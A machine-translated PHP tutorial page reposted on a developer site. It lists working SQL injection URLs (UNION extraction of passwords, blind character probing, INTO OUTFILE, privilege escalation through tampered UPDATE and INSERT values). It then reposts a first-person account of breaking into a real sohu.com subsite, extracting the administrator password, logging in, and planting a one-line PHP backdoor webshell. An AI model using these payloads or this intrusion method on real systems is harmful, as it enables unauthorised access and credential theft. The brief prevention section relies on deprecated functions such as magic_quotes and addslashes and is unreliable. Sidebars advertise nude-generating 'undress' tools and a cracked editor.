search
HomeBackend DevelopmentPHP TutorialPHP SQL injection process analysis_PHP tutorial
PHP SQL injection process analysis_PHP tutorialJul 21, 2016 pm 03:22 PM
phpsqlanalyzeBasicstudySkillinjectionofprocess

Today I learned basic skills about SQL injection from the Internet. The focus of SQL injection is to construct SQL statements. Only by flexibly using SQL
statements can we construct incredible injection strings. After studying, I wrote some notes and have them ready for use at any time. I hope you will understand the basic principles of SQL before reading the following content
. The code in the notes comes from the Internet.
 ===Basic part===
 This table query:
 http://127.0.0.1/injection/user.php?username=angel' and LENGTH(password) ='6
 http://127.0.0.1/injection/user.php?username=angel' and LEFT(password,1)='m
 Union union statement:
 http://127.0. 0.1/injection/show.php?id=1' union select 1,username,password from user/*
 http://127.0.0.1/injection/show.php?id=' union select 1,username,password from user/*
 Export file:
 http://127.0.0.1/injection/user.php?username=angel' into outfile 'c:/file.txt
 http://127.0.0.1 /injection/user.php?username=' or 1=1 into outfile 'c:/file.txt
 http://127.0.0.1/injection/show.php?id=' union select 1,username,password from user into outfile 'c:/user.txt
 INSERT statement:
 INSERT INTO `user` (userid, username, password, homepage, userlevel) VALUES ('', '$username ', '$password', '$homepage', '1');
The constructed homepage value is: http://4ngel.net', '3')#
The SQL statement becomes: INSERT INTO ` user` (userid, username, password, homepage, userlevel) VALUES ('', 'angel', 'mypass', 'http://4ngel.net', '3')#', '1');
 UPDATE statement: I like something like this
First understand this SQL sentence
UPDATE user SET password='MD5($password)', homepage='$homepage' WHERE id='$ id'
If this SQL is modified into the following form, injection is achieved
1: Modify the homepage value to
http://4ngel.net', userlevel='3
Then the SQL statement becomes For
UPDATE user SET password='mypass', homepage='http://4ngel.net', userlevel='3' WHERE id='$id'
Userlevel is user level
2: Modify The password value is
Mypass)' WHERE username='admin'#
Then the SQL statement becomes
UPDATE user SET password='MD5(mypass)' WHERE username='admin'#)', homepage= '$homepage' WHERE id='$id'
3: Modify the id value to
' OR username='admin'
Then the SQL statement becomes
UPDATE user SET password='MD5($ password)', homepage='$homepage' WHERE id='' OR username='admin'
 ===Advanced part===
Commonly used MySQL built-in functions
 DATABASE ()
USER()
SYSTEM_USER()
SESSION_USER()
CURRENT_USER()
database()
version()
SUBSTRING()
MID()
 char()
 load_file()
 ……
 Function application
 UPDATE article SET title=DATABASE() WHERE id=1
 http://127.0.0.1/injection/show.php?id=-1 union select 1,database(),version ()
SELECT * FROM user WHERE username=char(97,110,103,101,108)
# char(97,110,103,101,108) is equivalent to angel, decimal
http://127.0.0.1/injection/user.php?userid=1 and password=char(109,121,112,97,115,115)http://127.0.0.1/injection/user.php?userid=1 and LEFT(password,1)>char(100)
 http://127.0.0.1/injection /user.php?userid=1 and ord(mid(password,3,1))>111
Determine the number and type of fields in the data structure
http://127.0.0.1/injection/show. php?id=-1 union select 1,1,1
 http://127.0.0.1/injection/show.php?id=-1 union select char(97),char(97),char(97)
 Guess the data table name
 http://127.0.0.1/injection/show.php?id=-1 union select 1,1,1 from members
 Cross-table query to get the user name and password
http://127.0.0.1/ymdown/show.php?id=10000 union select 1,username,1,password,1,1,1,1,1,1,1,1,1,1,1,1 ,1,1,1 from ymdown_user where id=1
Others
#Verify the first password
http://127.0.0.1/ymdown/show.php?id=10 union select 1,1 ,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,1,1 ))=49
===Injection prevention===
Server aspect
Magic_quotes_gpc is set to On
Display_errors is set to Off
Encoding aspect
$keywords = addslashes($keywords) ;
$keywords = str_replace("_","_",$keywords);
$keywords = str_replace("%","%",$keywords);
Numeric type
Use intval() capture and replace
String type
Single quotes should be added to SQL statement parameters
The following code is used to prevent injection
if (get_magic_quotes_gpc()) {
//... .
 }else{
 $str = mysql_real_escape_string($str);
 $keywords = str_replace("_","_",$keywords);
 $keywords = str_replace("%" ,"%",$keywords);
 }
Useful functions
stripslashes()
get_magic_quotes_gpc()
mysql_real_escape_string()
strip_tags()
array_map()
Addslashes()
Reference article:
http://www.4ngel.net/article/36.htm (SQL Injection with MySQL) Chinese
http://www.phpe.net/mysql_manual /06-4.html (MYSQL statement reference)
A security check on sohu.com
Published on Hacker Defense Line
Published at http://www.loveshell.net
sohu.com It is a relatively large portal website in China and provides many services including email. It is difficult for such a large website to avoid problems. As the saying goes, the more services there are, the less secure it is! This is true for both servers and websites. I recently learned about Mysql injection, so I did it on sohu.com by the way. A small security check to see if it has SQL injection vulnerabilities.
Looking at the main site of sohu.com, I found that they were almost all static, so I gave up the idea of ​​finding problems on the main site. After browsing directly on the various sub-sites of sohu.com, I found that most websites use Php scripts, and a few use jsp scripts. Based on experience, we know that for systems built with Php, the background database is generally It is Mysql, just like asp corresponds to Mssql. It seems that there are still many possible problems. Due to the characteristics of Php (Php converts characters such as ' in the passed parameters by default, so it is difficult to inject character type variables by default), generally we can only inject numeric type variables. Based on our usual injection knowledge, we know that the parameters passed in the form of id=XXX are generally numeric variables, so we only need to test those connections with php?id=XXX to find the vulnerability! After some careful search , I really found a problematic connection on XXX.it.sohu.com http://XXX.it.sohu.com/book/serialize.php?id=86
Submit:
http://XXX.it.sohu.com/book/serialize.php?id=86 and 1=1/*
  Return to normal as shown in Figure 1.
Then submit:
http://XXX.it.sohu.com/book/serialize.php?id=86 and 1=2/*
Return no information as shown in Figure 2, it’s empty. It should be that the result of the SQL statement is empty.
From these two Urls, we can guess that the vulnerability exists, because the and 1=1 and and 1=2 we submitted are executed as Sql statements! Then other statements we submitted can also be executed. This It's Sql injected! We can also know that the id variable is treated as a number and is not placed between '', otherwise we will not succeed! If the variable does not filter other Sql keywords, we will be very successful. It may be successful! I have encountered many situations where variables filter the select, which is a dead end in mysql. It’s so depressing!
Since the loophole exists, let’s continue! The first thing is to detect the type and connection of the database. Database account! With high permissions and if the database and web are on the same machine, you can avoid the pain of guessing fields! Submit:
 http://XXX.it.sohu.com/book/serialize.php?id=86 and ord (mid(version(),1,1))>51/*
Return to normal as shown in Figure 3. This statement is to see if the database version is higher than 3, because the ASCII of 3 is 51! Version If the first character is greater than 51, of course it is 4.0 or above! 4.0 or above supports union query, so you can avoid the pain of guessing one by one! The result here is true, so the database is 4.0 or above, and it can be supported Union.
Since union query is supported, let’s expose the fields of this statement first! It will be very fast to use union to query anything in the future! Submit:
http://XXX.it.sohu.com/book /serialize.php?id=86 order by 10/*
The returned result is normal as shown in Figure 4. It seems that there are more than 10 fields. Continue to submit:
http://XXX.it.sohu.com/ book/serialize.php?id=86 order by 20/*
Return normally, submit:
http://XXX.it.sohu.com/book/serialize.php?id=86 order by 30/ *
 ...
When I ordered by 50, there was no information returned! It seemed that it was greater than 40 and less than 50, so I submitted:
http://XXX.it.sohu. com/book/serialize.php?id=86 order by 45/*
 ...
I finally guessed that the field is around 41! It is said left and right here because some fields cannot be sorted. So we still need to use union to accurately locate the field number is 41, submit:
 http://XXX.it.sohu.com/book/serialize.php?id=86 and 1=2 union select 1,2,3 ,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 ,29,30,31,32,33,34,35,36,37,38,39,40,41/*
The return result is as shown in Figure 5, haha, it was successful! Which fields will be displayed on the page? It’s clear at a glance! Now let’s continue! Submit:
 http://XXX.it.sohu.com/book/serialize.php?id=86 and 1=2 union select 1,user(),3,4 ,database(),6,7,8,9,10,version(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ,28,29,30,31,32,33,34,35,36,37,38,39,40,41/*
The return result is as shown in Figure 6. The detection of the database system is completed! We are very It may not be root, and the database server and web may not be on the same server. In this case, we will not have file permissions! Submit:
 http://XXX.it.sohu.com/book/serialize.php ?id=86 and (select count(*) from mysql.user)>0/*
The return result is as shown in Figure 7. There is no read permission for mysql, and I am more sure that the permission is not root! Haha!
Since you are not root, don’t be discouraged, let’s continue! Before further guessing the data, we’d better find the backend. Many times we find the administrator password but can’t find a place to log in. It’s very depressing! Add in the root directory Commonly used addresses in the backend such as /admin and /manage/ all return 404 errors. After guessing several times, I finally got a 403 Forbiden error when trying to admin in the /book/ directory. Haha, this directory exists! But the login page is alive and well. I can’t guess it, I’m depressed! But now that I know there is an admin, let’s search on Google:
admin site:sohu.com
As shown in Figure 8, we got the forum of another sub-site. We know the person It is very lazy. Usually the characteristics of the backend of a place are likely to be the characteristics of the entire website, so when I tried to access /book/admin/admuser.php, a miracle happened, as shown in Figure 9, haha, closer to success. Oh! Now we know the background of the website. In fact, we can also get very important information. Looking at the original file, we found that the name of the login form is name and password. It is easy to deduce the structure of the other party's administrator table, even if it does not match the It’s probably about the same, haha! So you know why we have to guess the background first! Keep injecting! Submit:
 http://XXX.it.sohu.com/book/serialize.php?id=86 and 1= 2 union select 1,user(),3,4,database(),6,7,8,9,10,version(),12,13,14,15,16,17,18,19,20,21 ,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 from admin/*
  Return error, It means that the admin table does not exist. Try admins, admin_user, etc., and finally submit:
 http://XXX.it.sohu.com/book/serialize.php?id=86 and 1=2 union select 1,user (),3,4,database(),6,7,8,9,10,version(),12,13,14,15,16,17,18,19,20,21,22,23,24 ,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 from user/*
when it returns successfully, haha! There is User This table! So is it an administrator table? What are the fields? Continue to submit:
 http://XXX.it.sohu.com/book/serialize.php?id=86 and 1=2 union select 1,name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25, 26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 from user/*
 Error returning empty information, submit:
 http ://XXX.it.sohu.com/book/serialize.php?id=86 and 1=2 union select 1,password,3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37, 38,39,40,41 from user/*
 The return result is as shown in Figure 10. Haha, it returns normally and a password comes out. It should be the password of the first user in the administrator table! So what is his user name? ? I guessed that many fields returned errors. When I had no choice but to enter an ID, the return was successful! The ID is the administrator’s name! Submit:
 http://XXX.it.sohu.com/book/ serialize.php?id=86 and 1=2 union select 1,password,3,4,id,6,7,8,9,10,11,12,13,14,15,16,17,18,19 ,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 from user/*
The return result is as shown in Figure 11, haha, I got the administrator’s name! I excitedly took the administrator’s name and password to the backend and logged in successfully! As shown in Figure 12.Now it’s time to think about how to get the webshell. I found a place to upload pictures in the background, but when I uploaded the php file, it prompted that it was not an image file. I was depressed! I carefully rummaged around in the background for a while and found that there was a The function of generating PHP files, so a one-sentence PHP backdoor was inserted into it, as shown in Figure 13. After clicking Generate, the prompt was successful. It seems that if there is no filtering, we should get the webshell. The password is a. Use one-sentence backdoor to connect As shown in Figure 14, haha, it was successful! The script detected that this was successfully completed!
After getting the webshell, I checked on the server and found that the security of the server was good, but the command could not be executed, and basically all Directories are not writable except for the directory we just uploaded. However, as a script test, it is considered successful if we get the webshell! It can also be seen that a small parameter without filtering can lead to the collapse of the website, especially Large websites like sohu.com have more parameters, so you need to pay more attention to filtering issues!

www.bkjia.comtruehttp: //www.bkjia.com/PHPjc/324786.htmlTechArticleI learned basic skills about SQL injection from the Internet today. The focus of SQL injection is to construct SQL statements. Only by using SQL statements flexibly can we construct incredible injection strings. After learning...
Statement
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn
php怎么把负数转为正整数php怎么把负数转为正整数Apr 19, 2022 pm 08:59 PM

php把负数转为正整数的方法:1、使用abs()函数将负数转为正数,使用intval()函数对正数取整,转为正整数,语法“intval(abs($number))”;2、利用“~”位运算符将负数取反加一,语法“~$number + 1”。

php怎么实现几秒后执行一个函数php怎么实现几秒后执行一个函数Apr 24, 2022 pm 01:12 PM

实现方法:1、使用“sleep(延迟秒数)”语句,可延迟执行函数若干秒;2、使用“time_nanosleep(延迟秒数,延迟纳秒数)”语句,可延迟执行函数若干秒和纳秒;3、使用“time_sleep_until(time()+7)”语句。

php怎么除以100保留两位小数php怎么除以100保留两位小数Apr 22, 2022 pm 06:23 PM

php除以100保留两位小数的方法:1、利用“/”运算符进行除法运算,语法“数值 / 100”;2、使用“number_format(除法结果, 2)”或“sprintf("%.2f",除法结果)”语句进行四舍五入的处理值,并保留两位小数。

php字符串有没有下标php字符串有没有下标Apr 24, 2022 am 11:49 AM

php字符串有下标。在PHP中,下标不仅可以应用于数组和对象,还可应用于字符串,利用字符串的下标和中括号“[]”可以访问指定索引位置的字符,并对该字符进行读写,语法“字符串名[下标值]”;字符串的下标值(索引值)只能是整数类型,起始值为0。

php怎么根据年月日判断是一年的第几天php怎么根据年月日判断是一年的第几天Apr 22, 2022 pm 05:02 PM

判断方法:1、使用“strtotime("年-月-日")”语句将给定的年月日转换为时间戳格式;2、用“date("z",时间戳)+1”语句计算指定时间戳是一年的第几天。date()返回的天数是从0开始计算的,因此真实天数需要在此基础上加1。

php怎么读取字符串后几个字符php怎么读取字符串后几个字符Apr 22, 2022 pm 08:31 PM

在php中,可以使用substr()函数来读取字符串后几个字符,只需要将该函数的第二个参数设置为负值,第三个参数省略即可;语法为“substr(字符串,-n)”,表示读取从字符串结尾处向前数第n个字符开始,直到字符串结尾的全部字符。

php怎么替换nbsp空格符php怎么替换nbsp空格符Apr 24, 2022 pm 02:55 PM

方法:1、用“str_replace(" ","其他字符",$str)”语句,可将nbsp符替换为其他字符;2、用“preg_replace("/(\s|\&nbsp\;||\xc2\xa0)/","其他字符",$str)”语句。

php怎么判断有没有小数点php怎么判断有没有小数点Apr 20, 2022 pm 08:12 PM

php判断有没有小数点的方法:1、使用“strpos(数字字符串,'.')”语法,如果返回小数点在字符串中第一次出现的位置,则有小数点;2、使用“strrpos(数字字符串,'.')”语句,如果返回小数点在字符串中最后一次出现的位置,则有。

See all articles

Hot AI Tools

Undresser.AI Undress

Undresser.AI Undress

AI-powered app for creating realistic nude photos

AI Clothes Remover

AI Clothes Remover

Online AI tool for removing clothes from photos.

Undress AI Tool

Undress AI Tool

Undress images for free

Clothoff.io

Clothoff.io

AI clothes remover

AI Hentai Generator

AI Hentai Generator

Generate AI Hentai for free.

Hot Article

R.E.P.O. Energy Crystals Explained and What They Do (Yellow Crystal)
2 weeks agoBy尊渡假赌尊渡假赌尊渡假赌
R.E.P.O. Best Graphic Settings
2 weeks agoBy尊渡假赌尊渡假赌尊渡假赌
R.E.P.O. How to Fix Audio if You Can't Hear Anyone
2 weeks agoBy尊渡假赌尊渡假赌尊渡假赌

Hot Tools

EditPlus Chinese cracked version

EditPlus Chinese cracked version

Small size, syntax highlighting, does not support code prompt function

Dreamweaver CS6

Dreamweaver CS6

Visual web development tools

WebStorm Mac version

WebStorm Mac version

Useful JavaScript development tools

SublimeText3 Mac version

SublimeText3 Mac version

God-level code editing software (SublimeText3)

DVWA

DVWA

Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is very vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, to help web developers better understand the process of securing web applications, and to help teachers/students teach/learn in a classroom environment Web application security. The goal of DVWA is to practice some of the most common web vulnerabilities through a simple and straightforward interface, with varying degrees of difficulty. Please note that this software